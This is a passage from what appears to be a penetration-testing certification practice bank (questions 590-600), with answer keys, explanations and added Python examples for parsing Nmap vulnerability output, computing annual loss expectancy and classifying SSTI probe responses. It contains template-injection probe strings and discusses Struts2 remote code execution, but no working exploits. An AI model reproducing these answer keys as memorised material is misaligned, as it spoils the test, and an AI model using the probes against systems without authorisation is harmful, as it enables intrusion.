This balances coverage and cost by prioritizing the most critical assets.

Why this answer

Conducting a targeted test focused on high-risk areas identified through threat modeling allows coverage of all three areas with limited depth, maximizing value within budget. Skipping areas or using only automated tools may not meet the client's full requirements.

590
Multi-Selectmedium

A penetration tester is performing passive reconnaissance against a target domain. Which of the following resources can be used to gather information about the target without directly sending packets to the target's network? (Select two.)

Select 2 answers
A.Shodan
B.Nmap
C.WHOIS database
D.hping3
AnswersA, C

Shodan aggregates data from active scans and makes it available for passive research.

Why this answer

Shodan is a search engine that scans the internet for devices and services, indexing banners and metadata from publicly exposed systems. Since it queries its own pre-collected database rather than sending packets to the target's network, it qualifies as passive reconnaissance. This allows a penetration tester to discover open ports, services, and even specific vulnerabilities associated with the target domain without direct interaction.

Exam trap

The trap here is that candidates often confuse 'passive' with 'stealthy' and incorrectly choose Nmap with options like -sS (stealth SYN scan), but any direct packet transmission to the target's network, regardless of stealth, constitutes active reconnaissance.

591
MCQmedium

A penetration tester is performing a vulnerability scan on a target network. The tester runs Nmap's vulnerability NSE scripts (--script vuln) against a web server. The scan report shows several 'http-vuln-cve2017-5638' findings. What does this indicate?

A.The target is vulnerable to Apache Struts2 remote code execution
B.The target is vulnerable to the Heartbleed bug in OpenSSL
C.The target is vulnerable to the Shellshock Bash vulnerability
D.The target has a SQL injection vulnerability
AnswerA

The script specifically tests for the Struts2 vulnerability that allows unauthenticated remote code execution via Content-Type headers.

Why this answer

The Nmap script 'http-vuln-cve2017-5638' specifically targets the Apache Struts2 remote code execution vulnerability (CVE-2017-5638). This vulnerability exists in the Jakarta Multipart parser used by Apache Struts2, allowing an attacker to execute arbitrary commands via crafted Content-Type headers. The presence of this finding in the scan report indicates the web server is running a vulnerable version of Apache Struts2.

Exam trap

The trap here is that candidates may confuse the CVE number or the technology name, assuming any 'http-vuln-cve' script refers to a generic web vulnerability, when in fact each script is tied to a specific software and CVE, such as Apache Struts2 for CVE-2017-5638.

How to eliminate wrong answers

Option B is wrong because the Heartbleed bug (CVE-2014-0160) is a vulnerability in OpenSSL, not Apache Struts2, and is detected by Nmap scripts like 'ssl-heartbleed', not 'http-vuln-cve2017-5638'. Option C is wrong because the Shellshock Bash vulnerability (CVE-2014-6271) affects the Bash shell and is typically exploited via CGI scripts, not through Apache Struts2's Jakarta Multipart parser, and is detected by scripts such as 'http-shellshock'.
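Reading script results out of Nmap's XML output rather than eyeballing the console, as an added example (not code from the question bank or from Nmap). The sample XML is constructed: the script/table/elem layout follows what the vulns NSE library emits for scripts like http-vuln-cve2017-5638 and ssl-heartbleed, while the host, ports and output strings are invented. The parser ties each result to its script, its state and its CVE, which is the distinction the exam trap above is about.

```python
import re
import xml.etree.ElementTree as ET  # for XML from an untrusted source prefer defusedxml

# Constructed Nmap -oX output, cut down to the parts that matter.
SAMPLE_NMAP_XML = """<nmaprun scanner="nmap" args="nmap --script vuln -oX - 10.0.0.5">
<host><address addr="10.0.0.5" addrtype="ipv4"/>
<ports>
<port protocol="tcp" portid="8080"><state state="open"/><service name="http"/>
<script id="http-vuln-cve2017-5638" output="VULNERABLE: Apache Struts Remote Code Execution Vulnerability">
<table key="CVE-2017-5638">
<elem key="title">Apache Struts Remote Code Execution Vulnerability</elem>
<elem key="state">VULNERABLE</elem>
<table key="ids"><elem>CVE:CVE-2017-5638</elem></table>
</table>
</script>
</port>
<port protocol="tcp" portid="443"><state state="open"/><service name="https"/>
<script id="ssl-heartbleed" output="NOT VULNERABLE">
<table key="CVE-2014-0160">
<elem key="title">The Heartbleed Bug</elem>
<elem key="state">NOT VULNERABLE</elem>
<table key="ids"><elem>CVE:CVE-2014-0160</elem></table>
</table>
</script>
</port>
</ports>
</host>
</nmaprun>
"""


def cve_from_script_id(script_id: str):
    """Recover the CVE a script name encodes: http-vuln-cve2017-5638 -> CVE-2017-5638."""
    m = re.search(r"cve(\d{4})-(\d+)", script_id, re.IGNORECASE)
    return f"CVE-{m.group(1)}-{m.group(2)}" if m else None


def parse_nse_vulns(xml_text: str) -> list:
    """One record per (host, port, script, vulnerability table) in the XML."""
    results = []
    root = ET.fromstring(xml_text)
    for host in root.iter("host"):
        addr_el = host.find("address")
        addr = addr_el.get("addr") if addr_el is not None else "?"
        for port in host.iter("port"):
            for script in port.findall("script"):
                script_id = script.get("id", "")
                for vuln in script.findall("table"):
                    state_el = vuln.find("elem[@key='state']")
                    title_el = vuln.find("elem[@key='title']")
                    ids = [e.text for e in vuln.findall("table[@key='ids']/elem") if e.text]
                    cves = [i.split(":", 1)[1] for i in ids if i.upper().startswith("CVE:")]
                    # Fall back to the script name when the structured ids are missing.
                    if not cves and cve_from_script_id(script_id):
                        cves = [cve_from_script_id(script_id)]
                    results.append({
                        "host": addr,
                        "port": int(port.get("portid")),
                        "script": script_id,
                        "key": vuln.get("key"),
                        "title": title_el.text if title_el is not None else "",
                        "state": state_el.text if state_el is not None else "UNKNOWN",
                        "cves": cves,
                    })
    return results


def vulnerable_only(results: list) -> list:
    """Keep confirmed hits; NOT VULNERABLE and LIKELY VULNERABLE are reported separately."""
    return [r for r in results if r["state"] == "VULNERABLE"]
```

Filtering on the state element matters: the vuln scripts also emit NOT VULNERABLE and LIKELY VULNERABLE entries, and a report that lists every script that ran as a finding is the kind of false positive the next question warns about.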

592
MCQmedium

Refer to the exhibit. A penetration tester is reviewing a web server error log. Based on the log, what vulnerability does the tester suspect?

A.Cross-site scripting
B.SQL injection
C.Remote code execution
D.Hardcoded credentials
AnswerD

The log reveals a database connection attempt with a username and password, suggesting credentials are hardcoded in the source code.

Why this answer

Option D is correct because the warning shows that a password is being used for database connection, and the message indicates hardcoded credentials (user 'test' with a password) are present in the code. Option A (XSS) is not evident. Option B (SQL injection) is not shown.

Option C (remote code execution) is not indicated.

593
MCQeasy

A penetration tester needs to provide a metric that communicates the financial risk of the identified vulnerabilities to the client's CFO. Which metric is most appropriate?

A.Annual Loss Expectancy (ALE).
B.CVSS base score.
C.Number of critical findings.
D.Technical difficulty of exploitation.
AnswerA

ALE expresses risk in financial terms, allowing the CFO to understand potential monetary impact and prioritize remediation spending.

Why this answer

Annual Loss Expectancy (ALE) is the most appropriate metric for communicating financial risk to a CFO because it quantifies the expected monetary loss per year from a vulnerability, calculated as ALE = Single Loss Expectancy (SLE) × Annualized Rate of Occurrence (ARO). This directly translates technical risk into financial terms, enabling informed budget decisions for remediation. CVSS base scores and critical finding counts lack a financial dimension, making them unsuitable for executive-level risk communication.

Exam trap

CompTIA often tests the misconception that technical severity scores (like CVSS) are sufficient for executive reporting, but the trap here is that financial risk requires a dollar-based metric like ALE, not a technical or count-based measure.

How to eliminate wrong answers

Option B is wrong because CVSS base score is a technical severity metric (0-10) based on exploitability and impact factors, not a financial measure; it does not incorporate asset value or loss frequency, so it cannot express monetary risk to a CFO. Option C is wrong because the number of critical findings is a raw count of high-severity vulnerabilities without any financial context; it ignores asset valuation, likelihood of exploitation, and potential loss, making it irrelevant for financial risk communication.
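The formula above carried through to what a CFO actually receives, as an added example (not from the question bank): each finding is priced with SLE = AV x EF and ALE = SLE x ARO, the findings are ranked by annual exposure, and a proposed fix is justified by the exposure it removes minus its running cost. The asset values, exposure factors and rates are invented for the example.

```python
from dataclasses import dataclass


@dataclass
class Finding:
    """One reported vulnerability with the inputs the ALE formula needs."""
    name: str
    asset_value: float      # AV: value of the asset the finding exposes
    exposure_factor: float  # EF: fraction of AV lost in a single incident (0..1)
    aro: float              # ARO: expected number of incidents per year

    def sle(self) -> float:
        """Single Loss Expectancy: SLE = AV x EF."""
        return self.asset_value * self.exposure_factor

    def ale(self) -> float:
        """Annual Loss Expectancy: ALE = SLE x ARO."""
        return self.sle() * self.aro


def rank_by_ale(findings):
    """Order findings by annual financial exposure, highest first."""
    return sorted(findings, key=lambda f: f.ale(), reverse=True)


def net_benefit_of_control(ale_before: float, ale_after: float, annual_control_cost: float) -> float:
    """Yearly value of a fix: exposure removed minus what the control costs to run.

    A negative result means the control costs more than the risk it removes,
    which is the argument a CFO needs in order to decline or defer it.
    """
    return (ale_before - ale_after) - annual_control_cost


def cfo_table(findings):
    """Rows a CFO can read: finding, SLE, ALE, all in currency units."""
    return [(f.name, round(f.sle(), 2), round(f.ale(), 2)) for f in rank_by_ale(findings)]


# Constructed sample findings with invented values.
SAMPLE_FINDINGS = [
    Finding("SQL injection in customer portal", asset_value=2_000_000, exposure_factor=0.30, aro=0.5),
    Finding("Outdated Struts on intranet app", asset_value=400_000, exposure_factor=0.50, aro=1.0),
    Finding("Directory listing on marketing site", asset_value=50_000, exposure_factor=0.10, aro=4.0),
]
```

Note that the ranking can differ from a CVSS ranking: the directory listing has the highest ARO but the lowest ALE, and the low-frequency, high-impact SQL injection tops the list, which is exactly the reordering the CFO audience needs to see.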

594
MCQeasy

A client wants a penetration test of their internal network. They are concerned about causing any disruption to the production systems. The tester should include which of the following in the rules of engagement to address this concern?

A.A list of all tools that will be used during the test
B.A clear definition of the testing window and contact information for emergency stop
C.A requirement for the client to disable their antivirus software
D.A statement that the tester will not be liable for any damages
AnswerB

This is essential to manage and halt testing if disruptions occur, aligning with client's concern.

Why this answer

Option B is correct because a clearly defined testing window with emergency stop contact information directly addresses the client's concern about production disruption. This ensures the tester can immediately halt activities if any instability is detected, aligning with the principle of minimizing operational impact during a penetration test.

Exam trap

The trap here is that candidates may mistakenly think listing tools or disabling antivirus is necessary for a thorough test, but the core concern is disruption prevention, which is directly addressed by the testing window and emergency stop clause in the RoE.

How to eliminate wrong answers

Option A is wrong because listing all tools used during the test does not prevent or mitigate disruption to production systems; it only provides transparency about the testing methodology. Option C is wrong because requiring the client to disable antivirus software would actually increase the risk of disruption, as it removes a critical security control that could detect and block malicious activity, potentially leading to unintended system instability or compromise.

595
MCQhard

A penetration tester receives pushback from a client's technical team regarding a finding, claiming it is not exploitable. Which of the following is the best response?

A.Escalate the issue to the executive without further discussion.
B.Provide additional evidence and offer to demonstrate the exploit in a controlled environment.
C.Downgrade the severity to low.
D.Remove the finding from the report to avoid conflict.
AnswerB

Demonstration proves exploitability.

Why this answer

Providing evidence and offering to demonstrate helps validate the finding and address concerns professionally.

596
MCQeasy

A penetration tester is preparing a report for a client. The client's C-suite executives need a high-level overview of the engagement results without technical jargon. Which section of the report is most appropriate for this audience?

A.Executive summary
B.Technical findings and remediation steps
C.Appendices with raw scan data
D.Methodology section
AnswerA

Provides high-level overview suitable for C-suite.

Why this answer

Option A is correct because the executive summary is written for non-technical stakeholders: a high-level overview of findings, overall risk and recommendations without technical jargon. Option B (technical findings and remediation steps) contains the detail developers and administrators need, not executives. Option C (appendices with raw scan data) is unsummarised tool output. Option D (methodology) describes how the test was performed, which is not what the C-suite is asking for.

597
MCQeasy

Which of the following tools would best assist a penetration tester in identifying known vulnerabilities in a WordPress installation?

A.OpenVAS
B.WPScan
C.Nessus
D.Nikto
AnswerB

WPScan is designed specifically for WordPress security assessments.

Why this answer

WPScan is specifically designed to enumerate and identify vulnerabilities in WordPress installations, including outdated plugins, themes, and core files. It uses a comprehensive database of WordPress CVEs and security issues, making it the most targeted tool for this task.

Exam trap

The trap here is that candidates often choose a general-purpose vulnerability scanner like Nessus or OpenVAS because they are familiar with them, but the question specifically asks for the best tool to identify known vulnerabilities in a WordPress installation, which requires a specialized scanner like WPScan.

How to eliminate wrong answers

Option A (OpenVAS) is wrong because it is a general-purpose vulnerability scanner that covers a wide range of systems and services, but it lacks the specialized WordPress-focused checks and plugin/theme enumeration that WPScan provides. Option C (Nessus) is wrong because, while it can detect some WordPress vulnerabilities, it is a broad-scope scanner that does not offer the deep, WordPress-specific fingerprinting and database of known vulnerabilities that WPScan does. Option D (Nikto) is wrong because it is a web server scanner that checks for common misconfigurations and outdated server software, but it does not perform the detailed WordPress core, plugin, and theme version analysis that WPScan excels at.

598
MCQmedium

During a penetration test, the tester finds that a web application is vulnerable to server-side template injection (SSTI). Which of the following payloads would be most effective to test for SSTI in an Express-based Node.js application using Handlebars?

A.{{7*7}}
B.{{7*'7'}}
C.<%= 7*7 %>
D.${7*7}
AnswerA

If SSTI is present, Handlebars rejects this probe with a template parse error rather than rendering it; that error, not a 49, is the confirmation.

Why this answer

Handlebars deliberately has no expression language, so it never evaluates 7*7. Compiling {{7*7}} instead throws a parse error (Handlebars reports something like "Parse error on line 1 ... Expecting 'ID' ... got 'INVALID'"), and that error is the signal: it proves the server compiled user input as a template, which is exactly the SSTI condition. A response of 49 would point to an engine that does evaluate arithmetic (Jinja2, Twig and similar); the probe echoed back unchanged means the input was treated as data. {{7*7}} remains the right first probe because it uses Handlebars' own delimiters, and reading the three outcomes (parse error, 49, or literal echo) tells the tester both whether SSTI exists and which engine is behind it.

Exam trap

CompTIA often tests the distinction between server-side template syntax (Handlebars) and client-side or other framework syntaxes, so candidates mistakenly choose ERB or template literal payloads that are not processed by the server.

How to eliminate wrong answers

Option B ({{7*'7'}}) is wrong because Handlebars cannot evaluate either form; it adds nothing over {{7*7}} and only makes the resulting error harder to read. Option C (<%= 7*7 %>) is wrong because it is ERB/EJS-style syntax that Handlebars never interprets. Option D (${7*7}) is wrong because it is the probe for FreeMarker-style Java engines and for JavaScript template literals; Handlebars passes it through untouched.
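The decision tree above as code, as an added example (not from the question bank): given a probe and the response it produced, the classifier distinguishes a Handlebars compile error (SSTI, no arithmetic possible), an evaluated 49 (SSTI in an arithmetic-capable engine) and a literal echo (no SSTI via that syntax). The responses are constructed; the first imitates the shape of a Handlebars parser message, the others are invented page fragments.

```python
import re

# Probe syntaxes and the engine families that evaluate them to 49.
PROBES = {
    "{{7*7}}": "Jinja2/Twig-family (mustache delimiters with an expression language)",
    "${7*7}": "FreeMarker/Velocity-family (also JavaScript template literals)",
    "<%= 7*7 %>": "ERB/EJS-family",
}

# Constructed responses used by the usage note and the checks below.
HANDLEBARS_ERROR = (
    "Error: Parse error on line 1:\n"
    "{{7*7}}\n"
    "---^\n"
    "Expecting 'ID', 'STRING', 'NUMBER', 'BOOLEAN', 'UNDEFINED', 'NULL', 'DATA', got 'INVALID'"
)
EVALUATED_PAGE = "<p>Welcome back, 49</p>"
ESCAPED_PAGE = "<p>Welcome back, {{7*7}}</p>"


def classify(probe: str, response: str) -> dict:
    """Interpret one probe/response pair. Returns ssti True/False/None (inconclusive)."""
    if probe not in PROBES:
        raise ValueError(f"unknown probe {probe!r}")
    text = response.lower()
    # Order matters: a Handlebars error quotes the offending line back, so the
    # parser message must be tested before literal reflection.
    if re.search(r"parse error on line \d+", text) and "expecting" in text:
        return {
            "probe": probe, "ssti": True, "engine_hint": "handlebars",
            "verdict": "template compile error: input reached the template compiler; "
                       "Handlebars has no arithmetic, so no 49 will ever appear",
        }
    if probe in response:
        return {
            "probe": probe, "ssti": False, "engine_hint": None,
            "verdict": "probe reflected literally: treated as data or escaped; try another syntax",
        }
    # A bare 49 that is not part of a larger number or a decimal.
    if re.search(r"(?<![\d.])49(?![\d.])", response):
        return {
            "probe": probe, "ssti": True, "engine_hint": PROBES[probe],
            "verdict": "arithmetic evaluated server-side: SSTI confirmed",
        }
    return {"probe": probe, "ssti": None, "engine_hint": None,
            "verdict": "inconclusive: diff against a baseline response"}
```

In practice each probe goes in a separate request and the response is diffed against a baseline with harmless input, because a page that happens to contain 49 (a price, a count) will otherwise produce a false confirmation.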

599
MCQeasy

A client wants to conduct a penetration test of their web application, but they are concerned about potential service disruption. They request that the tester avoid using any techniques that could cause the application to crash or become unresponsive. Which of the following should the tester include in the rules of engagement to address this requirement?

A.Specify that the tester will only use ACK scans and never send data payloads.
B.Include a clause that prohibits denial-of-service attacks and rate-limits all automated tools.
C.State that the tester will not use any automated tools and will perform only manual testing.
D.Do not include any specific limitation; the tester assumes responsibility for any outages.
AnswerB

Explicitly prohibiting DoS and implementing rate limits directly addresses the client's concern about service disruption.

Why this answer

Option B is correct because it directly addresses the client's concern by prohibiting denial-of-service attacks and implementing rate-limiting on automated tools. Rate-limiting prevents overwhelming the web application with requests, which could cause resource exhaustion or unresponsiveness, while the prohibition on DoS ensures no intentional disruption occurs. This aligns with the rules of engagement (RoE) requirement to scope the test safely.

Exam trap

The trap here is that candidates confuse 'avoiding service disruption' with 'avoiding all automated tools' or 'avoiding all payloads,' when the correct approach is to control the intensity of testing through rate-limiting and explicit prohibitions on disruptive techniques like DoS.

How to eliminate wrong answers

Option A is wrong because ACK scans are a type of port scan that can still disrupt a fragile service if sent at a high rate, and the statement 'never send data payloads' is overly restrictive and beside the point: most standard web tests (e.g., SQL injection probes) require request data and are safe when sent at a controlled rate. Option C is wrong because it unnecessarily bans all automated tools, which would severely limit the test's effectiveness; manual testing alone cannot efficiently cover a large web application, and automated tools can be used safely with rate limiting and proper configuration.

600
Multi-Selectmedium

Which TWO of the following are appropriate ways to handle sensitive data discovered during a penetration test when producing the final report? (Select TWO.)

Select 2 answers
A.Include the raw sensitive data in an appendix with restricted distribution.
B.Encrypt the report with a strong password and email it to all stakeholders.
C.Label the entire report as 'Sensitive' and leave data unaltered.
D.Securely delete any copies of sensitive data after the report is delivered.
E.Redact or mask the sensitive data in the report.
AnswersD, E

This follows data minimization principles.

Why this answer

Options D and E are correct. Sensitive data should be redacted or masked in the report (for example, showing only the first and last digits of a card number, or replacing a captured password with a placeholder), and any copies retained by the tester should be securely destroyed once the report is delivered and the agreed retention period has passed. Option A is wrong because including raw sensitive data, even in a restricted appendix, extends the exposure the test was meant to find. Option B is wrong because secure transmission is about delivery, not report content, and emailing the report to all stakeholders widens distribution beyond those who need the details. Option C is wrong because labelling the report is not a handling control; the sensitive values are still in it.
